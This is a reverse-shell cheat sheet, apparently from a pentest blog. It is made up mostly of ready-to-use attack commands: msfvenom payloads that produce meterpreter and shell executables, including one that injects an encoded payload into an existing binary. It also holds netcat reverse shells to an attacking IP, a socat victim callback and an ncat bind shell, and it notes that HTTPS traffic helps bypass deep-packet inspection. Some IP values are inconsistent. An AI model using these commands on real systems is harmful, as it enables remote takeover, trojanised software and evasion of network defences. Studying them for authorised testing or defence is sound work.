Netcat reverse shell without e over vpn

This is a great collection of different types of reverse shells and webshells. Many of the ones listed below come from this cheat-sheet:

Metasploit

There is an important difference between non-staged and staged payloads. A non-staged shell is sent over in one block. This can be caught with the metasploit multi-handler.

A staged payload first sends some part of itself and sets up the connection, and then it sends the rest. This can be useful when you have a very small buffer for your shellcode, so you need to divide up the payload. This can be caught with the metasploit multi-handler but not with netcat.

Standard meterpreter:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe
On the handler side: set payload windows/meterpreter/reverse_tcp

Meterpreter over HTTPS:
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
It makes the meterpreter traffic look normal. Since it is hidden in HTTPS the communication is encrypted and can be used to bypass deep-packet inspection.

Non-staged payload:
msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe

Staged payload:
msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe

Inject payload into an existing binary:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe

Netcat

With -e flag:
nc -e /bin/sh ATTACKING-IP 80

Without -e flag (a named pipe, /tmp/p, carries the shell's output back into the nc connection):
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0</tmp/p | /bin/sh 1>/tmp/p

Upgrade a netcat shell to an interactive one: Socat

Listener (server):
socat file:`tty`,raw,echo=0 tcp-listen:4444

Callback (victim/client):
socat tcp-connect:10.10.10.10:4444 exec:sh,pty,stderr,setsid,sigint,sane

Ncat

Ncat is a better and more modern version of netcat. One feature it has that netcat does not have is encryption. If you are on a pentest job you might not want to communicate unencrypted.

Bind:
ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl